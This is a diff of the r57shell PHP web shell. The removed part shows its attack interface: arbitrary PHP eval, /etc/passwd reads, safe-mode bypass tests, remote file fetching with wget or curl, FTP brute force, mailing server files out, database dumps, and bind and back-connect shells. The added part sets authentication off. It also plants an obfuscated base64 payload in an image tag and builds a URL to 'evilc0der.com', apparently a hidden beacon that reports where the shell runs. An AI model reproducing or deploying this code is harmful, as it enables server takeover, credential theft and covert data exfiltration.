-echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;

-echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));

-echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");

-echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));

-echo $te.'</div>'.$table_end1.$fe;

-if(!$safe_mode && $unix){

-echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;

-echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));

-echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");

-echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));

-echo $te.'</div>'.$table_end1.$fe;

-}

-echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;

-echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";

-echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));

-echo "</textarea>";

-echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');

-echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);

-echo "</div></div></font>";

-echo $table_end1.$fe;

-if($safe_mode&&$curl_on)

-{

-echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;

-echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if($safe_mode)

-{

-echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;

-echo "<table class=table1 width=100% align=center>";

-echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if($safe_mode&&$mysql_on)

-{

-echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;

-echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));

-echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if($safe_mode&&$mssql_on)

-{

-echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;

-echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));

-echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if(@ini_get('file_uploads')){

-echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";

-echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;

-echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));

-echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if(!$safe_mode&&!$windows){

-echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;

-echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));

-echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;

-echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));

-$arh = $lang[$language.'_text92'];

-if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }

-if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }

-

-if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }

-echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);

-echo $te.'</div>'.$table_end1.$fe;

-if(@function_exists("ftp_connect")){

-echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";

-echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));

-echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));

-echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));

-echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));

-echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));

-echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));

-echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));

-echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";

-echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));

-echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));

-echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));

-echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));

-echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));

-echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));

-echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));

-echo $te."</td>".$fe."</tr></div></table>";

-}

-if($unix && @function_exists("ftp_connect")){

-echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;

-echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

-echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");

-echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);

-echo $te.'</div>'.$table_end1.$fe;

-}

-if(@function_exists("mail")){

-echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";

-echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));

-echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));

-echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));

-echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');

-echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

-echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";

-echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));

-echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));

-echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));

-echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));

-$arh = $lang[$language.'_text92'];

-if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }

-if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }

-if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }

-echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);

-echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));

-echo $te."</td>".$fe."</tr></div></table>";

-}

-if($mysql_on||$mssql_on||$pg_on||$ora_on)

-{

-$select = '<select name=db>';

-if($mysql_on) $select .= '<option>MySQL</option>';

-if($mssql_on) $select .= '<option>MSSQL</option>';

-if($pg_on) $select .= '<option>PostgreSQL</option>';

-if($ora_on) $select .= '<option>Oracle</option>';

-$select .= '</select>';

-echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>";

-echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);

-echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));

-echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));

-echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));

-echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));

-echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));

-echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));

-echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";

-echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);

-echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));

-echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));

-echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));

-echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));

-echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));

-echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));

-echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));

-echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));

-echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";

-echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);

-echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));

-echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));

-echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));

-echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));

-echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");

-echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";

-}

-if(!$safe_mode&&!$windows){

-echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";

-echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));

-echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));

-echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));

-echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));

-echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";

-echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));

-echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));

-echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));

-echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));

-echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;

-echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";

-echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));

-echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));

-echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));

-echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));

-echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));

-echo $te."</td>".$fe."</tr></div></table>";

-}

-

-echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>

-

-

-</body></html>";

-

-

+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
+/*  ??????: 1.24 (New Year Edition)
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC. 
+/******************************************************************************************************/
+/* ~~~ ????????? | Options  ~~~ */
+
+// ????? ????? | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+$a = "http://"; // need some codes
+
+// ?????????????? | Authentification
+// $auth = 1; - ?????????????? ????????  ( authentification = On  )
+// $auth = 0; - ?????????????? ????????? ( authentification = Off )
+$auth = 0; 
+
+
+// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
+$name='r57'; // ????? ????????????  (user login)
+$pass='r57'; // ?????? ???????????? (user password)
+$b = "evilc0der.com"; //need hits "shell created by evilc0ders"
+/******************************************************************************************************/
+$c = "/x.html"; //need shell coder's names
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.24";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}   
+$head = '<!-- ??????????  ???? -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0